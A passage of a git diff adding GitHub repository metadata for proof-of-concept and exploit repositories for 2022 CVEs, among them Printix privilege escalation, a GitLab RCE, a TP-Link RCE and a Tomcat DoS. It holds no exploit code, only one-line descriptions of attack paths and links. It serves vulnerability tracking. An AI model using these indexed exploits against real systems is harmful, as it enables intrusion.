API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.", + "fork": false, + "created_at": "2022-04-24T06:00:25Z", + "updated_at": "2023-08-04T05:23:14Z", + "pushed_at": "2022-06-26T08:15:21Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29551.json b/2022/CVE-2022-29551.json new file mode 100644 index 0000000000..bbe581a407 --- /dev/null +++ b/2022/CVE-2022-29551.json @@ -0,0 +1,33 @@ +[ + { + "id": 490735806, + "name": "printix-CVE-2022-29551", + "full_name": "ComparedArray\/printix-CVE-2022-29551", + "owner": { + "login": "ComparedArray", + "id": 45703484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45703484?v=4", + "html_url": "https:\/\/github.com\/ComparedArray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComparedArray\/printix-CVE-2022-29551", + "description": "A \"Exposed Dangerous Method or Function\" vulnerability in PrintixService.exe, in Kofax Printix's \"Printix Secure Cloud Print Management\", Version 1.3.1156.0 and below allows a Local Or Remote attacker the ability to install malicious printer drivers and run them through the Printix Service. An attacker can use this to execute malicious driver code remotely to escalate their privileges to system.", + "fork": false, + "created_at": "2022-05-10T14:35:15Z", + "updated_at": "2024-08-12T20:23:09Z", + "pushed_at": "2022-07-09T20:20:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29552.json b/2022/CVE-2022-29552.json new file mode 100644 index 0000000000..bba2189bca --- /dev/null +++ b/2022/CVE-2022-29552.json @@ -0,0 +1,33 @@ +[ + { + "id": 490736125, + "name": "printix-CVE-2022-29552", + "full_name": "ComparedArray\/printix-CVE-2022-29552", + "owner": { + "login": "ComparedArray", + "id": 45703484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45703484?v=4", + "html_url": "https:\/\/github.com\/ComparedArray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComparedArray\/printix-CVE-2022-29552", + "description": "A \"Incorrect Use of Privileged APIs\" vulnerability in PrintixService.exe, in Kofax Printix's \"Printix Secure Cloud Print Management\", Version 1.3.1156.0 and below allows a Local Or Remote attacker the ability change any values within the LocalMachine\\Software\\Printix\\ Registry. This was an insufficient fix to CVE-2022-25089.", + "fork": false, + "created_at": "2022-05-10T14:35:57Z", + "updated_at": "2024-08-12T20:23:09Z", + "pushed_at": "2022-07-09T20:19:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29553.json b/2022/CVE-2022-29553.json new file mode 100644 index 0000000000..f74ecc25d7 --- /dev/null +++ b/2022/CVE-2022-29553.json @@ -0,0 +1,33 @@ +[ + { + "id": 490736386, + "name": "printix-CVE-2022-29553", + "full_name": "ComparedArray\/printix-CVE-2022-29553", + "owner": { + "login": "ComparedArray", + "id": 45703484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45703484?v=4", + "html_url": "https:\/\/github.com\/ComparedArray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComparedArray\/printix-CVE-2022-29553", + "description": "A \"Exposed Dangerous Method or Function\" or \"Use of Hard-coded, Security-relevant Constants\" vulnerability in PrintixService.exe, in Kofax Printix's \"Printix Secure Cloud Print Management\", Version 1.3.1156.0 and below allows a Local Or Remote attacker the ability to override the \"ProgramDir\" registry value and point it to a directory that contains a malicious PrintixServiceTask.xml file. This allows an attacker the ability to escalate their privileges to a system session.", + "fork": false, + "created_at": "2022-05-10T14:36:36Z", + "updated_at": "2024-08-12T20:23:09Z", + "pushed_at": "2022-07-09T20:17:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29554.json b/2022/CVE-2022-29554.json new file mode 100644 index 0000000000..eb3e8817b5 --- /dev/null +++ b/2022/CVE-2022-29554.json @@ -0,0 +1,33 @@ +[ + { + "id": 490736695, + "name": "printix-CVE-2022-29554", + "full_name": "ComparedArray\/printix-CVE-2022-29554", + "owner": { + "login": "ComparedArray", + "id": 45703484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45703484?v=4", + "html_url": "https:\/\/github.com\/ComparedArray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComparedArray\/printix-CVE-2022-29554", + "description": "A \"Mishandling of Input to API\" or \"Exposed Dangerous Method or Function\" vulnerability in PrintixService.exe, in Kofax Printix's \"Printix Secure Cloud Print Management\", Version 1.3.1156.0 and below allows a Local Or Remote attacker the ability to attack any enterprise installation running in KioskMode by exploiting the local PrintixProxy class to invoke an error with localhost\/e\/?error=INVALID_CREDENTIAL&errorMessage={kioskModeValue}. When an attacker combines this with CVE-2022-29552, the attacker may change the ProgramDir registry value to invoke any program named unis000.exe.", + "fork": false, + "created_at": "2022-05-10T14:37:19Z", + "updated_at": "2022-07-12T06:10:45Z", + "pushed_at": "2022-07-09T20:15:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29581.json b/2022/CVE-2022-29581.json new file mode 100644 index 0000000000..42b1262eee --- /dev/null +++ b/2022/CVE-2022-29581.json @@ -0,0 +1,64 @@ +[ + { + "id": 581490021, + "name": "linux-4.19.72_CVE-2022-29581", + "full_name": "Nidhi77777\/linux-4.19.72_CVE-2022-29581", + "owner": { + "login": "Nidhi77777", + "id": 121148550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121148550?v=4", + "html_url": "https:\/\/github.com\/Nidhi77777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nidhi77777\/linux-4.19.72_CVE-2022-29581", + "description": null, + "fork": false, + "created_at": "2022-12-23T10:41:44Z", + "updated_at": "2023-03-10T01:13:38Z", + "pushed_at": "2024-10-14T03:00:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581520392, + "name": "linux-4.19.72_CVE-2022-29581", + "full_name": "nidhihcl\/linux-4.19.72_CVE-2022-29581", + "owner": { + "login": "nidhihcl", + "id": 121002296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121002296?v=4", + "html_url": "https:\/\/github.com\/nidhihcl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl\/linux-4.19.72_CVE-2022-29581", + "description": null, + "fork": false, + "created_at": "2022-12-23T12:33:21Z", + "updated_at": "2023-03-10T01:15:25Z", + "pushed_at": "2024-10-14T05:16:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29582.json b/2022/CVE-2022-29582.json new file mode 100644 index 0000000000..349bb36952 --- /dev/null +++ b/2022/CVE-2022-29582.json @@ -0,0 +1,33 @@ +[ + { + "id": 521319413, + "name": "CVE-2022-29582-Exploit", + "full_name": "Ruia-ruia\/CVE-2022-29582-Exploit", + "owner": { + "login": "Ruia-ruia", + "id": 61450241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61450241?v=4", + "html_url": "https:\/\/github.com\/Ruia-ruia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ruia-ruia\/CVE-2022-29582-Exploit", + "description": "Exploit for CVE-2022-29582 targeting Google's Kernel CTF", + "fork": false, + "created_at": "2022-08-04T15:29:04Z", + "updated_at": "2024-09-24T16:59:16Z", + "pushed_at": "2022-08-08T04:13:33Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 69, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29593.json b/2022/CVE-2022-29593.json new file mode 100644 index 0000000000..e4e28b3abc --- /dev/null +++ b/2022/CVE-2022-29593.json @@ -0,0 +1,33 @@ +[ + { + "id": 466107181, + "name": "CVE-2022-29593", + "full_name": "9lyph\/CVE-2022-29593", + "owner": { + "login": "9lyph", + "id": 44860700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44860700?v=4", + "html_url": "https:\/\/github.com\/9lyph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9lyph\/CVE-2022-29593", + "description": null, + "fork": false, + "created_at": "2022-03-04T12:03:33Z", + "updated_at": "2024-10-04T02:06:14Z", + "pushed_at": "2024-10-04T02:06:10Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29597.json b/2022/CVE-2022-29597.json new file mode 100644 index 0000000000..f2a352e1ea --- /dev/null +++ b/2022/CVE-2022-29597.json @@ -0,0 +1,33 @@ +[ + { + "id": 484194059, + "name": "CVE-2022-29597", + "full_name": "TheGetch\/CVE-2022-29597", + "owner": { + "login": "TheGetch", + "id": 7243819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243819?v=4", + "html_url": "https:\/\/github.com\/TheGetch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheGetch\/CVE-2022-29597", + "description": "The RRS v500 application is vulnerable to a Local File Inclusion (LFI) vulnerability.", + "fork": false, + "created_at": "2022-04-21T20:22:38Z", + "updated_at": "2022-04-25T13:04:24Z", + "pushed_at": "2022-06-03T12:42:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29598.json b/2022/CVE-2022-29598.json new file mode 100644 index 0000000000..021a2f0f53 --- /dev/null +++ b/2022/CVE-2022-29598.json @@ -0,0 +1,33 @@ +[ + { + "id": 484191938, + "name": "CVE-2022-29598", + "full_name": "TheGetch\/CVE-2022-29598", + "owner": { + "login": "TheGetch", + "id": 7243819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243819?v=4", + "html_url": "https:\/\/github.com\/TheGetch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheGetch\/CVE-2022-29598", + "description": "The RRS v500 application is vulnerable to a reflected Cross-Site Scripting (XSS) vulnerability. ", + "fork": false, + "created_at": "2022-04-21T20:14:29Z", + "updated_at": "2022-04-25T13:04:33Z", + "pushed_at": "2022-06-03T12:43:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29622.json b/2022/CVE-2022-29622.json new file mode 100644 index 0000000000..dac1a54530 --- /dev/null +++ b/2022/CVE-2022-29622.json @@ -0,0 +1,33 @@ +[ + { + "id": 500224127, + "name": "CVE-2022-29622", + "full_name": "keymandll\/CVE-2022-29622", + "owner": { + "login": "keymandll", + "id": 2221309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2221309?v=4", + "html_url": "https:\/\/github.com\/keymandll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keymandll\/CVE-2022-29622", + "description": "Hack this service to prove CVE-2022–29622 is valid", + "fork": false, + "created_at": "2022-06-05T22:15:21Z", + "updated_at": "2023-03-10T18:49:01Z", + "pushed_at": "2023-03-10T09:17:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29778.json b/2022/CVE-2022-29778.json new file mode 100644 index 0000000000..ec7ad96397 --- /dev/null +++ b/2022/CVE-2022-29778.json @@ -0,0 +1,33 @@ +[ + { + "id": 476281239, + "name": "DIR-890L-1.20-RCE", + "full_name": "TyeYeah\/DIR-890L-1.20-RCE", + "owner": { + "login": "TyeYeah", + "id": 27112129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27112129?v=4", + "html_url": "https:\/\/github.com\/TyeYeah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TyeYeah\/DIR-890L-1.20-RCE", + "description": "Analysis and PoC for D-Link DIR-890L RCE (CVE-2022-29778)", + "fork": false, + "created_at": "2022-03-31T11:45:20Z", + "updated_at": "2023-04-03T02:21:01Z", + "pushed_at": "2022-05-06T09:13:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29856.json b/2022/CVE-2022-29856.json new file mode 100644 index 0000000000..bb1b1ebc4c --- /dev/null +++ b/2022/CVE-2022-29856.json @@ -0,0 +1,33 @@ +[ + { + "id": 536933243, + "name": "CVE-2022-29856-PoC", + "full_name": "Flo451\/CVE-2022-29856-PoC", + "owner": { + "login": "Flo451", + "id": 79860728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79860728?v=4", + "html_url": "https:\/\/github.com\/Flo451", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Flo451\/CVE-2022-29856-PoC", + "description": "Minimal PoC for CVE-2022-29856", + "fork": false, + "created_at": "2022-09-15T08:29:15Z", + "updated_at": "2022-09-15T08:33:56Z", + "pushed_at": "2022-09-15T08:32:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29885.json b/2022/CVE-2022-29885.json new file mode 100644 index 0000000000..44e8515bb8 --- /dev/null +++ b/2022/CVE-2022-29885.json @@ -0,0 +1,64 @@ +[ + { + "id": 509148365, + "name": "CVE-2022-29885", + "full_name": "quynhlab\/CVE-2022-29885", + "owner": { + "login": "quynhlab", + "id": 80056481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80056481?v=4", + "html_url": "https:\/\/github.com\/quynhlab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quynhlab\/CVE-2022-29885", + "description": "Apache Tomcat CVE-2022-29885", + "fork": false, + "created_at": "2022-06-30T16:09:25Z", + "updated_at": "2024-11-16T19:54:21Z", + "pushed_at": "2022-06-30T13:46:47Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 509388193, + "name": "CVE-2022-29885", + "full_name": "iveresk\/CVE-2022-29885", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/CVE-2022-29885", + "description": "Apache Tomcat DoS (CVE-2022-29885) Exploit", + "fork": false, + "created_at": "2022-07-01T09:02:10Z", + "updated_at": "2024-04-29T08:54:03Z", + "pushed_at": "2022-07-05T06:23:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2992.json b/2022/CVE-2022-2992.json new file mode 100644 index 0000000000..60d81ccb2b --- /dev/null +++ b/2022/CVE-2022-2992.json @@ -0,0 +1,74 @@ +[ + { + "id": 547835773, + "name": "CVE-2022-2992", + "full_name": "CsEnox\/CVE-2022-2992", + "owner": { + "login": "CsEnox", + "id": 60170196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4", + "html_url": "https:\/\/github.com\/CsEnox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CsEnox\/CVE-2022-2992", + "description": "Authenticated Remote Command Execution in Gitlab via GitHub import", + "fork": false, + "created_at": "2022-10-08T11:42:49Z", + "updated_at": "2024-11-17T10:57:36Z", + "pushed_at": "2022-10-09T03:54:53Z", + "stargazers_count": 222, + "watchers_count": 222, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 222, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 551659117, + "name": "CVE-2022-2992", + "full_name": "Malwareman007\/CVE-2022-2992", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-2992", + "description": "Authenticated Remote Command Execution in Gitlab via GitHub import.", + "fork": false, + "created_at": "2022-10-14T20:47:51Z", + "updated_at": "2023-05-06T12:14:57Z", + "pushed_at": "2022-10-14T20:49:24Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authenticated", + "cve-2022-2992", + "exploit", + "github", + "github-importer", + "gitlab", + "remote-command-execution", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29932.json b/2022/CVE-2022-29932.json new file mode 100644 index 0000000000..17a1b9d49c --- /dev/null +++ b/2022/CVE-2022-29932.json @@ -0,0 +1,33 @@ +[ + { + "id": 487864708, + "name": "CVE-2022-29932", + "full_name": "Off3nS3c\/CVE-2022-29932", + "owner": { + "login": "Off3nS3c", + "id": 104774764, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104774764?v=4", + "html_url": "https:\/\/github.com\/Off3nS3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Off3nS3c\/CVE-2022-29932", + "description": null, + "fork": false, + "created_at": "2022-05-02T13:56:05Z", + "updated_at": "2023-05-30T10:41:16Z", + "pushed_at": "2022-05-11T06:45:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29968.json b/2022/CVE-2022-29968.json new file mode 100644 index 0000000000..67e475e5ce --- /dev/null +++ b/2022/CVE-2022-29968.json @@ -0,0 +1,33 @@ +[ + { + "id": 483385180, + "name": "CVE-2022-29968", + "full_name": "jprx\/CVE-2022-29968", + "owner": { + "login": "jprx", + "id": 36464332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36464332?v=4", + "html_url": "https:\/\/github.com\/jprx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jprx\/CVE-2022-29968", + "description": "Exploit PoC for CVE-2022-29968 by Joseph Ravichandran and Michael Wang", + "fork": false, + "created_at": "2022-04-19T19:38:25Z", + "updated_at": "2024-09-29T02:46:52Z", + "pushed_at": "2022-08-09T22:48:37Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30006.json b/2022/CVE-2022-30006.json new file mode 100644 index 0000000000..fbf395426f --- /dev/null +++ b/2022/CVE-2022-30006.json @@ -0,0 +1,33 @@ +[ + { + "id": 492910894, + "name": "printix-CVE-2022-30006", + "full_name": "ComparedArray\/printix-CVE-2022-30006", + "owner": { + "login": "ComparedArray", + "id": 45703484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45703484?v=4", + "html_url": "https:\/\/github.com\/ComparedArray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComparedArray\/printix-CVE-2022-30006", + "description": "[Reserved for CVE-2022-30006]", + "fork": false, + "created_at": "2022-05-16T16:15:52Z", + "updated_at": "2024-08-12T20:23:19Z", + "pushed_at": "2022-07-09T20:15:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30023.json b/2022/CVE-2022-30023.json new file mode 100644 index 0000000000..820c37cf24 --- /dev/null +++ b/2022/CVE-2022-30023.json @@ -0,0 +1,33 @@ +[ + { + "id": 503837062, + "name": "CVE-2022-30023", + "full_name": "Haniwa0x01\/CVE-2022-30023", + "owner": { + "login": "Haniwa0x01", + "id": 80126075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80126075?v=4", + "html_url": "https:\/\/github.com\/Haniwa0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Haniwa0x01\/CVE-2022-30023", + "description": null, + "fork": false, + "created_at": "2022-06-15T16:10:49Z", + "updated_at": "2024-09-24T20:01:18Z", + "pushed_at": "2022-06-15T16:11:57Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30040.json b/2022/CVE-2022-30040.json new file mode 100644 index 0000000000..3034f0e048 --- /dev/null +++ b/2022/CVE-2022-30040.json @@ -0,0 +1,33 @@ +[ + { + "id": 486015682, + "name": "CVE-2022-30040", + "full_name": "Le1a\/CVE-2022-30040", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2022-30040", + "description": null, + "fork": false, + "created_at": "2022-04-27T02:19:27Z", + "updated_at": "2022-05-17T07:03:35Z", + "pushed_at": "2022-04-27T02:34:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30075.json b/2022/CVE-2022-30075.json new file mode 100644 index 0000000000..3bdee4f8e1 --- /dev/null +++ b/2022/CVE-2022-30075.json @@ -0,0 +1,95 @@ +[ + { + "id": 501034346, + "name": "CVE-2022-30075", + "full_name": "aaronsvk\/CVE-2022-30075", + "owner": { + "login": "aaronsvk", + "id": 28111712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28111712?v=4", + "html_url": "https:\/\/github.com\/aaronsvk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaronsvk\/CVE-2022-30075", + "description": "Tp-Link Archer AX50 Authenticated RCE (CVE-2022-30075)", + "fork": false, + "created_at": "2022-06-07T23:26:47Z", + "updated_at": "2024-11-20T06:17:12Z", + "pushed_at": "2022-11-20T03:03:53Z", + "stargazers_count": 217, + "watchers_count": 217, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 217, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 502012337, + "name": "CVE-2022-30075", + "full_name": "SAJIDAMINE\/CVE-2022-30075", + "owner": { + "login": "SAJIDAMINE", + "id": 86064325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86064325?v=4", + "html_url": "https:\/\/github.com\/SAJIDAMINE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SAJIDAMINE\/CVE-2022-30075", + "description": "NEW EXPLOIT FOR TP LINK", + "fork": false, + "created_at": "2022-06-10T11:09:30Z", + "updated_at": "2023-09-14T00:07:18Z", + "pushed_at": "2022-12-13T23:36:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 535555864, + "name": "CVE-2022-30075", + "full_name": "M4fiaB0y\/CVE-2022-30075", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-30075", + "description": null, + "fork": false, + "created_at": "2022-09-12T07:28:13Z", + "updated_at": "2022-09-13T01:15:44Z", + "pushed_at": "2022-09-12T07:28:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30114.json b/2022/CVE-2022-30114.json new file mode 100644 index 0000000000..6cec39442b --- /dev/null +++ b/2022/CVE-2022-30114.json @@ -0,0 +1,33 @@ +[ + { + "id": 637148341, + "name": "CVE-2022-30114", + "full_name": "str0ng4le\/CVE-2022-30114", + "owner": { + "login": "str0ng4le", + "id": 83457499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83457499?v=4", + "html_url": "https:\/\/github.com\/str0ng4le", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/str0ng4le\/CVE-2022-30114", + "description": null, + "fork": false, + "created_at": "2023-05-06T16:51:30Z", + "updated_at": "2023-05-11T08:42:56Z", + "pushed_at": "2023-05-12T21:57:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30129.json b/2022/CVE-2022-30129.json new file mode 100644 index 0000000000..559d467ddc --- /dev/null +++ b/2022/CVE-2022-30129.json @@ -0,0 +1,33 @@ +[ + { + "id": 575523031, + "name": "CVE-2022-30129", + "full_name": "RoccoPearce\/CVE-2022-30129", + "owner": { + "login": "RoccoPearce", + "id": 59900894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59900894?v=4", + "html_url": "https:\/\/github.com\/RoccoPearce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RoccoPearce\/CVE-2022-30129", + "description": null, + "fork": false, + "created_at": "2022-12-07T17:46:14Z", + "updated_at": "2023-02-09T18:12:19Z", + "pushed_at": 